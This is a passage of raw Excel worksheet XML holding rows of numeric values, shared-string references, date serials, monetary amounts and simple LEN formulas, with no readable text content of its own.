        <f>LEN(I475)</f>
        <v>0</v>
      </c>
      <c r="L475">
        <f>LEN(J475)</f>
        <v>43</v>
      </c>
    </row>
    <row r="476" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A476">
        <v>21074</v>
      </c>
      <c r="B476">
        <v>368</v>
      </c>
      <c r="C476" t="s">
        <v>1436</v>
      </c>
      <c r="D476" t="s">
        <v>9671</v>
      </c>
      <c r="E476">
        <v>14</v>
      </c>
      <c r="F476" t="s">
        <v>9849</v>
      </c>
      <c r="G476" s="1">
        <v>44039</v>
      </c>
      <c r="H476">
        <v>0</v>
      </c>
      <c r="J476" t="s">
        <v>10634</v>
      </c>
      <c r="K476">
        <f>LEN(I476)</f>
        <v>0</v>
      </c>
      <c r="L476">
        <f>LEN(J476)</f>
        <v>43</v>
      </c>
    </row>
    <row r="477" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A477">
        <v>21248</v>
      </c>
      <c r="B477">
        <v>368</v>
      </c>
      <c r="C477" t="s">
        <v>1436</v>
      </c>
      <c r="D477" t="s">
        <v>9671</v>
      </c>
      <c r="E477">
        <v>14</v>
      </c>
      <c r="F477" t="s">
        <v>9640</v>
      </c>
      <c r="G477" s="1">
        <v>44039</v>
      </c>
      <c r="H477">
        <v>25734</v>
      </c>
      <c r="J477" t="s">
        <v>10634</v>
      </c>
      <c r="K477">
        <f>LEN(I477)</f>
        <v>0</v>
      </c>
      <c r="L477">
        <f>LEN(J477)</f>
        <v>43</v>
      </c>
    </row>
    <row r="478" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A478">
        <v>21323</v>
      </c>
      <c r="B478">
        <v>4759</v>
      </c>
      <c r="C478" t="s">
        <v>7012</v>
      </c>
      <c r="D478" t="s">
        <v>11305</v>
      </c>
      <c r="E478">
        <v>16</v>
      </c>
      <c r="F478" t="s">
        <v>10343</v>
      </c>
      <c r="G478" s="1">
        <v>44048</v>
      </c>
      <c r="H478">
        <v>745000</v>
      </c>
      <c r="J478" t="s">
        <v>11306</v>
      </c>
      <c r="K478">
        <f>LEN(I478)</f>
        <v>0</v>
      </c>
      <c r="L478">
        <f>LEN(J478)</f>
        <v>43</v>
      </c>
    </row>
    <row r="479" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A479">
        <v>20034</v>
      </c>
      <c r="B479">
        <v>2621</v>
      </c>
      <c r="C479" t="s">
        <v>5461</v>
      </c>
      <c r="D479" t="s">
        <v>10410</v>
      </c>
      <c r="E479">
        <v>16</v>
      </c>
      <c r="F479" t="s">
        <v>10416</v>
      </c>
      <c r="G479" s="1">
        <v>43952</v>
      </c>
      <c r="H479">
        <v>60000</v>
      </c>
      <c r="I479" t="s">
        <v>10417</v>
      </c>
      <c r="J479" t="s">
        <v>10414</v>
      </c>
      <c r="K479">
        <f>LEN(I479)</f>
        <v>108</v>
      </c>
      <c r="L479">
        <f>LEN(J479)</f>
        <v>42</v>
      </c>
    </row>
    <row r="480" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A480">
        <v>20032</v>
      </c>
      <c r="B480">
        <v>2621</v>
      </c>
      <c r="C480" t="s">
        <v>5461</v>
      </c>
      <c r="D480" t="s">
        <v>10410</v>
      </c>
      <c r="E480">
        <v>16</v>
      </c>
      <c r="F480" t="s">
        <v>3686</v>
      </c>
      <c r="G480" s="1">
        <v>43952</v>
      </c>
      <c r="H480">
        <v>120000</v>
      </c>
      <c r="I480" t="s">
        <v>10413</v>
      </c>
      <c r="J480" t="s">
        <v>10414</v>
      </c>
      <c r="K480">
        <f>LEN(I480)</f>
        <v>107</v>
      </c>
      <c r="L480">
        <f>LEN(J480)</f>
        <v>42</v>
      </c>
    </row>
    <row r="481" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A481">
        <v>20033</v>
      </c>
      <c r="B481">
        <v>2621</v>
      </c>
      <c r="C481" t="s">
        <v>5461</v>
      </c>
      <c r="D481" t="s">
        <v>10410</v>
      </c>
      <c r="E481">
        <v>16</v>
      </c>
      <c r="F481" t="s">
        <v>3462</v>
      </c>
      <c r="G481" s="1">
        <v>43952</v>
      </c>
      <c r="H481">
        <v>12000</v>
      </c>
      <c r="I481" t="s">
        <v>10415</v>
      </c>
      <c r="J481" t="s">
        <v>10414</v>
      </c>
      <c r="K481">
        <f>LEN(I481)</f>
        <v>88</v>
      </c>
      <c r="L481">
        <f>LEN(J481)</f>
        <v>42</v>
      </c>
    </row>
    <row r="482" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A482">
        <v>20552</v>
      </c>
      <c r="B482">
        <v>1973</v>
      </c>
      <c r="C482" t="s">
        <v>5826</v>
      </c>
      <c r="D482" t="s">
        <v>10796</v>
      </c>
      <c r="E482">
        <v>16</v>
      </c>
      <c r="F482" t="s">
        <v>10803</v>
      </c>
      <c r="G482" s="1">
        <v>44067</v>
      </c>
      <c r="H482">
        <v>300000</v>
      </c>
      <c r="I482" t="s">
        <v>10804</v>
      </c>
      <c r="J482" t="s">
        <v>10802</v>
      </c>
      <c r="K482">
        <f>LEN(I482)</f>
        <v>72</v>
      </c>
      <c r="L482">
        <f>LEN(J482)</f>
        <v>42</v>
      </c>
    </row>
    <row r="483" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A483">
        <v>20551</v>
      </c>
      <c r="B483">
        <v>1973</v>
      </c>
      <c r="C483" t="s">
        <v>5826</v>
      </c>
      <c r="D483" t="s">
        <v>10796</v>
      </c>
      <c r="E483">
        <v>16</v>
      </c>
      <c r="F483" t="s">
        <v>9437</v>
      </c>
      <c r="G483" s="1">
        <v>44067</v>
      </c>
      <c r="H483">
        <v>3000000</v>
      </c>
      <c r="I483" t="s">
        <v>10801</v>
      </c>
      <c r="J483" t="s">
        <v>10802</v>
      </c>
      <c r="K483">
        <f>LEN(I483)</f>
        <v>69</v>
      </c>
      <c r="L483">
        <f>LEN(J483)</f>
        <v>42</v>
      </c>
    </row>
    <row r="484" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A484">
        <v>20721</v>
      </c>
      <c r="B484">
        <v>2332</v>
      </c>
      <c r="C484" t="s">
        <v>5974</v>
      </c>
      <c r="D484" t="s">
        <v>9594</v>
      </c>
      <c r="E484">
        <v>13</v>
      </c>
      <c r="F484" t="s">
        <v>9435</v>
      </c>
      <c r="G484" s="1">
        <v>44000</v>
      </c>
      <c r="H484">
        <v>50000</v>
      </c>
      <c r="I484" t="s">
        <v>10929</v>
      </c>
      <c r="J484" t="s">
        <v>10930</v>
      </c>
      <c r="K484">
        <f>LEN(I484)</f>
        <v>47</v>
      </c>
      <c r="L484">
        <f>LEN(J484)</f>
        <v>42</v>
      </c>
    </row>
    <row r="485" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A485">
        <v>19407</v>
      </c>
      <c r="B485">
        <v>2244</v>
      </c>
      <c r="C485" t="s">
        <v>4940</v>
      </c>
      <c r="D485" t="s">
        <v>10008</v>
      </c>
      <c r="E485">
        <v>28</v>
      </c>
      <c r="F485" t="s">
        <v>10009</v>
      </c>
      <c r="G485" s="1">
        <v>43888</v>
      </c>
      <c r="H485">
        <v>374566</v>
      </c>
      <c r="I485" t="s">
        <v>10010</v>
      </c>
      <c r="J485" t="s">
        <v>10011</v>
      </c>
      <c r="K485">
        <f>LEN(I485)</f>
        <v>33</v>
      </c>
      <c r="L485">
        <f>LEN(J485)</f>
        <v>42</v>
      </c>
    </row>
    <row r="486" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A486">
        <v>20363</v>
      </c>
      <c r="B486">
        <v>509</v>
      </c>
      <c r="C486" t="s">
        <v>932</v>
      </c>
      <c r="D486" t="s">
        <v>10653</v>
      </c>
      <c r="E486">
        <v>26</v>
      </c>
      <c r="F486" t="s">
        <v>9437</v>
      </c>
      <c r="G486" s="1">
        <v>43906</v>
      </c>
      <c r="H486">
        <v>90000</v>
      </c>
      <c r="I486" t="s">
        <v>9693</v>
      </c>
      <c r="J486" t="s">
        <v>10658</v>
      </c>
      <c r="K486">
        <f>LEN(I486)</f>
        <v>33</v>
      </c>
      <c r="L486">
        <f>LEN(J486)</f>
        <v>42</v>
      </c>
    </row>
    <row r="487" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A487">
        <v>20365</v>
      </c>
      <c r="B487">
        <v>509</v>
      </c>
      <c r="C487" t="s">
        <v>932</v>
      </c>
      <c r="D487" t="s">
        <v>10653</v>
      </c>
      <c r="E487">
        <v>26</v>
      </c>
      <c r="F487" t="s">
        <v>9527</v>
      </c>
      <c r="G487" s="1">
        <v>43906</v>
      </c>
      <c r="H487">
        <v>30000</v>
      </c>
      <c r="I487" t="s">
        <v>9693</v>
      </c>
      <c r="J487" t="s">
        <v>10658</v>
      </c>
      <c r="K487">
        <f>LEN(I487)</f>
        <v>33</v>
      </c>
      <c r="L487">
        <f>LEN(J487)</f>
        <v>42</v>
      </c>
    </row>
    <row r="488" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A488">
        <v>20553</v>
      </c>
      <c r="B488">
        <v>1973</v>
      </c>
      <c r="C488" t="s">
        <v>5826</v>
      </c>
      <c r="D488" t="s">
        <v>10796</v>
      </c>
      <c r="E488">
        <v>16</v>
      </c>
      <c r="F488" t="s">
        <v>10071</v>
      </c>
      <c r="G488" s="1">
        <v>44067</v>
      </c>
      <c r="H488">
        <v>1000000</v>
      </c>
      <c r="I488" t="s">
        <v>9693</v>
      </c>
      <c r="J488" t="s">
        <v>10802</v>
      </c>
      <c r="K488">
        <f>LEN(I488)</f>
        <v>33</v>
      </c>
      <c r="L488">
        <f>LEN(J488)</f>
        <v>42</v>
      </c>
    </row>
    <row r="489" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A489">
        <v>20554</v>
      </c>
      <c r="B489">
        <v>1973</v>
      </c>
      <c r="C489" t="s">
        <v>5826</v>
      </c>
      <c r="D489" t="s">
        <v>10796</v>
      </c>
      <c r="E489">
        <v>16</v>
      </c>
      <c r="F489" t="s">
        <v>3204</v>
      </c>
      <c r="G489" s="1">
        <v>44067</v>
      </c>
      <c r="H489">
        <v>100000</v>
      </c>
      <c r="I489" t="s">
        <v>9693</v>
      </c>
      <c r="J489" t="s">
        <v>10802</v>
      </c>
      <c r="K489">
        <f>LEN(I489)</f>
        <v>33</v>
      </c>
      <c r="L489">
        <f>LEN(J489)</f>
        <v>42</v>
      </c>
    </row>
    <row r="490" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A490">
        <v>20907</v>
      </c>
      <c r="B490">
        <v>1973</v>
      </c>
      <c r="C490" t="s">
        <v>5826</v>
      </c>
      <c r="D490" t="s">
        <v>11055</v>
      </c>
      <c r="E490">
        <v>16</v>
      </c>
      <c r="F490" t="s">
        <v>7564</v>
      </c>
      <c r="G490" s="1">
        <v>44067</v>
      </c>
      <c r="H490">
        <v>100000</v>
      </c>
      <c r="I490" t="s">
        <v>9693</v>
      </c>
      <c r="J490" t="s">
        <v>10802</v>
      </c>
      <c r="K490">
        <f>LEN(I490)</f>
        <v>33</v>
      </c>
      <c r="L490">
        <f>LEN(J490)</f>
        <v>42</v>
      </c>
    </row>
    <row r="491" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A491">
        <v>20524</v>
      </c>
      <c r="B491">
        <v>2777</v>
      </c>
      <c r="C491" t="s">
        <v>789</v>
      </c>
      <c r="D491" t="s">
        <v>10768</v>
      </c>
      <c r="E491">
        <v>12</v>
      </c>
      <c r="F491" t="s">
        <v>9459</v>
      </c>
      <c r="G491" s="1">
        <v>43952</v>
      </c>
      <c r="H491">
        <v>85000</v>
      </c>
      <c r="I491" t="s">
        <v>9550</v>
      </c>
      <c r="J491" t="s">
        <v>10065</v>
      </c>
      <c r="K491">
        <f>LEN(I491)</f>
        <v>18</v>
      </c>
      <c r="L491">
        <f>LEN(J491)</f>
        <v>42</v>
      </c>
    </row>
    <row r="492" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A492">
        <v>20531</v>
      </c>
      <c r="B492">
        <v>771</v>
      </c>
      <c r="C492" t="s">
        <v>1045</v>
      </c>
      <c r="D492" t="s">
        <v>10776</v>
      </c>
      <c r="E492">
        <v>11</v>
      </c>
      <c r="F492" t="s">
        <v>10463</v>
      </c>
      <c r="G492" s="1">
        <v>44011</v>
      </c>
      <c r="H492">
        <v>75000</v>
      </c>
      <c r="I492" t="s">
        <v>9550</v>
      </c>
      <c r="J492" t="s">
        <v>10780</v>
      </c>
      <c r="K492">
        <f>LEN(I492)</f>
        <v>18</v>
      </c>
      <c r="L492">
        <f>LEN(J492)</f>
        <v>42</v>
      </c>
    </row>
    <row r="493" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A493">
        <v>19717</v>
      </c>
      <c r="B493">
        <v>235</v>
      </c>
      <c r="C493" t="s">
        <v>486</v>
      </c>
      <c r="D493" t="s">
        <v>10198</v>
      </c>
      <c r="E493">
        <v>16</v>
      </c>
      <c r="F493" t="s">
        <v>10199</v>
      </c>
      <c r="G493" s="1">
        <v>43885</v>
      </c>
      <c r="H493">
        <v>100000</v>
      </c>
      <c r="I493" t="s">
        <v>9746</v>
      </c>
      <c r="J493" t="s">
        <v>10200</v>
      </c>
      <c r="K493">
        <f>LEN(I493)</f>
        <v>13</v>
      </c>
      <c r="L493">
        <f>LEN(J493)</f>
        <v>42</v>
      </c>
    </row>
    <row r="494" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A494">
        <v>19463</v>
      </c>
      <c r="B494">
        <v>389</v>
      </c>
      <c r="C494" t="s">
        <v>410</v>
      </c>
      <c r="D494" t="s">
        <v>10063</v>
      </c>
      <c r="E494">
        <v>16</v>
      </c>
      <c r="F494" t="s">
        <v>10064</v>
      </c>
      <c r="G494" s="1">
        <v>44004</v>
      </c>
      <c r="H494">
        <v>150000</v>
      </c>
      <c r="J494" t="s">
        <v>10065</v>
      </c>
      <c r="K494">
        <f>LEN(I494)</f>
        <v>0</v>
      </c>
      <c r="L494">
        <f>LEN(J494)</f>
        <v>42</v>
      </c>
    </row>
    <row r="495" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A495">
        <v>19464</v>
      </c>
      <c r="B495">
        <v>389</v>
      </c>
      <c r="C495" t="s">
        <v>410</v>
      </c>
      <c r="D495" t="s">
        <v>10063</v>
      </c>
      <c r="E495">
        <v>16</v>
      </c>
      <c r="F495" t="s">
        <v>10066</v>
      </c>
      <c r="G495" s="1">
        <v>44004</v>
      </c>
      <c r="H495">
        <v>2000</v>
      </c>
      <c r="J495" t="s">
        <v>10065</v>
      </c>
      <c r="K495">
        <f>LEN(I495)</f>
        <v>0</v>
      </c>
      <c r="L495">
        <f>LEN(J495)</f>
        <v>42</v>
      </c>
    </row>
    <row r="496" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A496">
        <v>19465</v>
      </c>
      <c r="B496">
        <v>389</v>
      </c>
      <c r="C496" t="s">
        <v>410</v>
      </c>
      <c r="D496" t="s">
        <v>10063</v>
      </c>
      <c r="E496">
        <v>16</v>
      </c>
      <c r="F496" t="s">
        <v>9437</v>
      </c>
      <c r="G496" s="1">
        <v>44004</v>
      </c>
      <c r="H496">
        <v>60000</v>
      </c>
      <c r="J496" t="s">
        <v>10065</v>
      </c>
      <c r="K496">
        <f>LEN(I496)</f>
        <v>0</v>
      </c>
      <c r="L496">
        <f>LEN(J496)</f>
        <v>42</v>
      </c>
    </row>
    <row r="497" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A497">
        <v>19466</v>
      </c>
      <c r="B497">
        <v>389</v>
      </c>
      <c r="C497" t="s">
        <v>410</v>
      </c>
      <c r="D497" t="s">
        <v>10063</v>
      </c>
      <c r="E497">
        <v>16</v>
      </c>
      <c r="F497" t="s">
        <v>10067</v>
      </c>
      <c r="G497" s="1">
        <v>44004</v>
      </c>
      <c r="H497">
        <v>75000</v>
      </c>
      <c r="J497" t="s">
        <v>10065</v>
      </c>
      <c r="K497">
        <f>LEN(I497)</f>
        <v>0</v>
      </c>
      <c r="L497">
        <f>LEN(J497)</f>
        <v>42</v>
      </c>
    </row>
    <row r="498" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A498">
        <v>19726</v>
      </c>
      <c r="B498">
        <v>634</v>
      </c>
      <c r="C498" t="s">
        <v>494</v>
      </c>
      <c r="D498" t="s">
        <v>10205</v>
      </c>
      <c r="E498">
        <v>2</v>
      </c>
      <c r="F498" t="s">
        <v>9470</v>
      </c>
      <c r="G498" s="1">
        <v>43914</v>
      </c>
      <c r="H498">
        <v>100000</v>
      </c>
      <c r="J498" t="s">
        <v>10065</v>
      </c>
      <c r="K498">
        <f>LEN(I498)</f>
        <v>0</v>
      </c>
      <c r="L498">
        <f>LEN(J498)</f>
        <v>42</v>
      </c>
    </row>
    <row r="499" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A499">
        <v>20050</v>
      </c>
      <c r="B499">
        <v>2669</v>
      </c>
      <c r="C499" t="s">
        <v>5588</v>
      </c>
      <c r="D499" t="s">
        <v>10434</v>
      </c>
      <c r="E499">
        <v>12</v>
      </c>
      <c r="F499" t="s">
        <v>10438</v>
      </c>
      <c r="G499" s="1">
        <v>43928</v>
      </c>
      <c r="H499">
        <v>34913</v>
      </c>
      <c r="J499" t="s">
        <v>10439</v>
      </c>
      <c r="K499">
        <f>LEN(I499)</f>
        <v>0</v>
      </c>
      <c r="L499">
        <f>LEN(J499)</f>
        <v>42</v>
      </c>
    </row>
    <row r="500" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A500">
        <v>20182</v>
      </c>
      <c r="B500">
        <v>367</v>
      </c>
      <c r="C500" t="s">
        <v>744</v>
      </c>
      <c r="D500" t="s">
        <v>10528</v>
      </c>
      <c r="E500">
        <v>14</v>
      </c>
      <c r="F500" t="s">
        <v>10463</v>
      </c>
      <c r="G500" s="1">
        <v>44217</v>
      </c>
      <c r="H500">
        <v>72000</v>
      </c>
      <c r="J500" t="s">
        <v>10065</v>
      </c>
      <c r="K500">
        <f>LEN(I500)</f>
        <v>0</v>
      </c>
      <c r="L500">
        <f>LEN(J500)</f>
        <v>42</v>
      </c>
    </row>
    <row r="501" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A501">
        <v>21146</v>
      </c>
      <c r="B501">
        <v>592</v>
      </c>
      <c r="C501" t="s">
        <v>354</v>
      </c>
      <c r="D501" t="s">
        <v>10032</v>
      </c>
      <c r="E501">
        <v>12</v>
      </c>
      <c r="F501" t="s">
        <v>609</v>
      </c>
      <c r="G501" s="1">
        <v>44095</v>
      </c>
      <c r="H501">
        <v>10000</v>
      </c>
      <c r="J501" t="s">
        <v>11170</v>
      </c>
      <c r="K501">
        <f>LEN(I501)</f>
        <v>0</v>
      </c>
      <c r="L501">
        <f>LEN(J501)</f>
        <v>42</v>
      </c>
    </row>
    <row r="502" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A502">
        <v>19986</v>
      </c>
      <c r="B502">
        <v>633</v>
      </c>
      <c r="C502" t="s">
        <v>16305</v>
      </c>
      <c r="D502" t="s">
        <v>16306</v>
      </c>
      <c r="E502">
        <v>26</v>
      </c>
      <c r="F502" t="s">
        <v>10377</v>
      </c>
      <c r="G502" s="1">
        <v>43920</v>
      </c>
      <c r="H502" s="4">
        <v>46266422</v>
      </c>
      <c r="I502" t="s">
        <v>10378</v>
      </c>
      <c r="J502" t="s">
        <v>10379</v>
      </c>
      <c r="K502">
        <f>LEN(I502)</f>
        <v>60</v>
      </c>
      <c r="L502">
        <f>LEN(J502)</f>
        <v>41</v>
      </c>
    </row>
    <row r="503" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A503">
        <v>19987</v>
      </c>
      <c r="B503">
        <v>633</v>
      </c>
      <c r="C503" t="s">
        <v>16305</v>
      </c>
      <c r="D503" t="s">
        <v>16306</v>
      </c>
      <c r="E503">
        <v>26</v>
      </c>
      <c r="F503" t="s">
        <v>10380</v>
      </c>
      <c r="G503" s="1">
        <v>43920</v>
      </c>
      <c r="H503" s="4">
        <v>31751466</v>
      </c>
      <c r="I503" t="s">
        <v>10378</v>
      </c>
      <c r="J503" t="s">
        <v>10379</v>
      </c>
      <c r="K503">
        <f>LEN(I503)</f>
        <v>60</v>
      </c>
      <c r="L503">
        <f>LEN(J503)</f>
        <v>41</v>
      </c>
    </row>
    <row r="504" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A504">
        <v>21141</v>
      </c>
      <c r="B504">
        <v>4571</v>
      </c>
      <c r="C504" t="s">
        <v>7076</v>
      </c>
      <c r="D504" t="s">
        <v>11167</v>
      </c>
      <c r="E504">
        <v>28</v>
      </c>
      <c r="F504" t="s">
        <v>11168</v>
      </c>
      <c r="G504" s="1">
        <v>44140</v>
      </c>
      <c r="H504">
        <v>10000</v>
      </c>
      <c r="I504" t="s">
        <v>10334</v>
      </c>
      <c r="J504" t="s">
        <v>9986</v>
      </c>
      <c r="K504">
        <f>LEN(I504)</f>
        <v>48</v>
      </c>
      <c r="L504">
        <f>LEN(J504)</f>
        <v>41</v>
      </c>
    </row>
    <row r="505" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A505">
        <v>21142</v>
      </c>
      <c r="B505">
        <v>4571</v>
      </c>
      <c r="C505" t="s">
        <v>7076</v>
      </c>
      <c r="D505" t="s">
        <v>11167</v>
      </c>
      <c r="E505">
        <v>28</v>
      </c>
      <c r="F505" t="s">
        <v>11169</v>
      </c>
      <c r="G505" s="1">
        <v>44140</v>
      </c>
      <c r="H505">
        <v>10000</v>
      </c>
      <c r="I505" t="s">
        <v>10334</v>
      </c>
      <c r="J505" t="s">
        <v>9986</v>
      </c>
      <c r="K505">
        <f>LEN(I505)</f>
        <v>48</v>
      </c>
      <c r="L505">
        <f>LEN(J505)</f>
        <v>41</v>
      </c>
    </row>
    <row r="506" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A506">
        <v>21143</v>
      </c>
      <c r="B506">
        <v>4571</v>
      </c>
      <c r="C506" t="s">
        <v>7076</v>
      </c>
      <c r="D506" t="s">
        <v>11167</v>
      </c>
      <c r="E506">
        <v>28</v>
      </c>
      <c r="F506" t="s">
        <v>2236</v>
      </c>
      <c r="G506" s="1">
        <v>44140</v>
      </c>
      <c r="H506">
        <v>20000</v>
      </c>
      <c r="I506" t="s">
        <v>10334</v>
      </c>
      <c r="J506" t="s">
        <v>9986</v>
      </c>
      <c r="K506">
        <f>LEN(I506)</f>
        <v>48</v>
      </c>
      <c r="L506">
        <f>LEN(J506)</f>
        <v>41</v>
      </c>
    </row>
    <row r="507" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A507">
        <v>21144</v>
      </c>
      <c r="B507">
        <v>4571</v>
      </c>
      <c r="C507" t="s">
        <v>7076</v>
      </c>
      <c r="D507" t="s">
        <v>11167</v>
      </c>
      <c r="E507">
        <v>28</v>
      </c>
      <c r="F507" t="s">
        <v>673</v>
      </c>
      <c r="G507" s="1">
        <v>44140</v>
      </c>
      <c r="H507">
        <v>10000</v>
      </c>
      <c r="I507" t="s">
        <v>10334</v>
      </c>
      <c r="J507" t="s">
        <v>9986</v>
      </c>
      <c r="K507">
        <f>LEN(I507)</f>
        <v>48</v>
      </c>
      <c r="L507">
        <f>LEN(J507)</f>
        <v>41</v>
      </c>
    </row>
    <row r="508" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A508">
        <v>19385</v>
      </c>
      <c r="B508">
        <v>2277</v>
      </c>
      <c r="C508" t="s">
        <v>4703</v>
      </c>
      <c r="D508" t="s">
        <v>9564</v>
      </c>
      <c r="E508">
        <v>26</v>
      </c>
      <c r="F508" t="s">
        <v>609</v>
      </c>
      <c r="G508" s="1">
        <v>43845</v>
      </c>
      <c r="H508">
        <v>10000</v>
      </c>
      <c r="I508" t="s">
        <v>9985</v>
      </c>
      <c r="J508" t="s">
        <v>9986</v>
      </c>
      <c r="K508">
        <f>LEN(I508)</f>
        <v>35</v>
      </c>
      <c r="L508">
        <f>LEN(J508)</f>
        <v>41</v>
      </c>
    </row>
    <row r="509" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A509">
        <v>21140</v>
      </c>
      <c r="B509">
        <v>4571</v>
      </c>
      <c r="C509" t="s">
        <v>7076</v>
      </c>
      <c r="D509" t="s">
        <v>11167</v>
      </c>
      <c r="E509">
        <v>28</v>
      </c>
      <c r="F509" t="s">
        <v>9437</v>
      </c>
      <c r="G509" s="1">
        <v>44140</v>
      </c>
      <c r="H509">
        <v>10000</v>
      </c>
      <c r="I509" t="s">
        <v>10010</v>
      </c>
      <c r="J509" t="s">
        <v>9986</v>
      </c>
      <c r="K509">
        <f>LEN(I509)</f>
        <v>33</v>
      </c>
      <c r="L509">
        <f>LEN(J509)</f>
        <v>41</v>
      </c>
    </row>
    <row r="510" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A510">
        <v>19304</v>
      </c>
      <c r="B510">
        <v>2353</v>
      </c>
      <c r="C510" t="s">
        <v>4876</v>
      </c>
      <c r="D510" t="s">
        <v>9906</v>
      </c>
      <c r="E510">
        <v>34</v>
      </c>
      <c r="F510" t="s">
        <v>3763</v>
      </c>
      <c r="G510" s="1">
        <v>43859</v>
      </c>
      <c r="H510">
        <v>100000</v>
      </c>
      <c r="I510" t="s">
        <v>9550</v>
      </c>
      <c r="J510" t="s">
        <v>9912</v>
      </c>
      <c r="K510">
        <f>LEN(I510)</f>
        <v>18</v>
      </c>
      <c r="L510">
        <f>LEN(J510)</f>
        <v>41</v>
      </c>
    </row>
    <row r="511" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A511">
        <v>19305</v>
      </c>
      <c r="B511">
        <v>2353</v>
      </c>
      <c r="C511" t="s">
        <v>4876</v>
      </c>
      <c r="D511" t="s">
        <v>9906</v>
      </c>
      <c r="E511">
        <v>34</v>
      </c>
      <c r="F511" t="s">
        <v>6917</v>
      </c>
      <c r="G511" s="1">
        <v>43859</v>
      </c>
      <c r="H511">
        <v>50000</v>
      </c>
      <c r="I511" t="s">
        <v>9550</v>
      </c>
      <c r="J511" t="s">
        <v>9912</v>
      </c>
      <c r="K511">
        <f>LEN(I511)</f>
        <v>18</v>
      </c>
      <c r="L511">
        <f>LEN(J511)</f>
        <v>41</v>
      </c>
    </row>
    <row r="512" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A512">
        <v>20541</v>
      </c>
      <c r="B512">
        <v>2718</v>
      </c>
      <c r="C512" t="s">
        <v>6936</v>
      </c>
      <c r="D512" t="s">
        <v>10784</v>
      </c>
      <c r="E512">
        <v>26</v>
      </c>
      <c r="F512" t="s">
        <v>4686</v>
      </c>
      <c r="G512" s="1">
        <v>43921</v>
      </c>
      <c r="H512">
        <v>2000</v>
      </c>
      <c r="J512" t="s">
        <v>10789</v>
      </c>
      <c r="K512">
        <f>LEN(I512)</f>
        <v>0</v>
      </c>
      <c r="L512">
        <f>LEN(J512)</f>
        <v>41</v>
      </c>
    </row>
    <row r="513" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A513">
        <v>19923</v>
      </c>
      <c r="B513">
        <v>2611</v>
      </c>
      <c r="C513" t="s">
        <v>5505</v>
      </c>
      <c r="D513" t="s">
        <v>10332</v>
      </c>
      <c r="E513">
        <v>19</v>
      </c>
      <c r="F513" t="s">
        <v>10336</v>
      </c>
      <c r="G513" s="1">
        <v>43881</v>
      </c>
      <c r="H513">
        <v>200000</v>
      </c>
      <c r="I513" t="s">
        <v>10337</v>
      </c>
      <c r="J513" t="s">
        <v>10338</v>
      </c>
      <c r="K513">
        <f>LEN(I513)</f>
        <v>88</v>
      </c>
      <c r="L513">
        <f>LEN(J513)</f>
        <v>40</v>
      </c>
    </row>
    <row r="514" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A514">
        <v>19925</v>
      </c>
      <c r="B514">
        <v>2611</v>
      </c>
      <c r="C514" t="s">
        <v>5505</v>
      </c>
      <c r="D514" t="s">
        <v>10332</v>
      </c>
      <c r="E514">
        <v>19</v>
      </c>
      <c r="F514" t="s">
        <v>10339</v>
      </c>
      <c r="G514" s="1">
        <v>43881</v>
      </c>
      <c r="H514">
        <v>100000</v>
      </c>
      <c r="I514" t="s">
        <v>10340</v>
      </c>
      <c r="J514" t="s">
        <v>10338</v>
      </c>
      <c r="K514">
        <f>LEN(I514)</f>
        <v>68</v>
      </c>
      <c r="L514">
        <f>LEN(J514)</f>
        <v>40</v>
      </c>
    </row>
    <row r="515" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A515">
        <v>19926</v>
      </c>
      <c r="B515">
        <v>2611</v>
      </c>
      <c r="C515" t="s">
        <v>5505</v>
      </c>
      <c r="D515" t="s">
        <v>10332</v>
      </c>
      <c r="E515">
        <v>19</v>
      </c>
      <c r="F515" t="s">
        <v>3763</v>
      </c>
      <c r="G515" s="1">
        <v>43881</v>
      </c>
      <c r="H515">
        <v>200000</v>
      </c>
      <c r="I515" t="s">
        <v>10340</v>
      </c>
      <c r="J515" t="s">
        <v>10338</v>
      </c>
      <c r="K515">
        <f>LEN(I515)</f>
        <v>68</v>
      </c>
      <c r="L515">
        <f>LEN(J515)</f>
        <v>40</v>
      </c>
    </row>
    <row r="516" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A516">
        <v>19927</v>
      </c>
      <c r="B516">
        <v>2611</v>
      </c>
      <c r="C516" t="s">
        <v>5505</v>
      </c>
      <c r="D516" t="s">
        <v>10332</v>
      </c>
      <c r="E516">
        <v>19</v>
      </c>
      <c r="F516" t="s">
        <v>6917</v>
      </c>
      <c r="G516" s="1">
        <v>43881</v>
      </c>
      <c r="H516">
        <v>100000</v>
      </c>
      <c r="I516" t="s">
        <v>10340</v>
      </c>
      <c r="J516" t="s">
        <v>10338</v>
      </c>
      <c r="K516">
        <f>LEN(I516)</f>
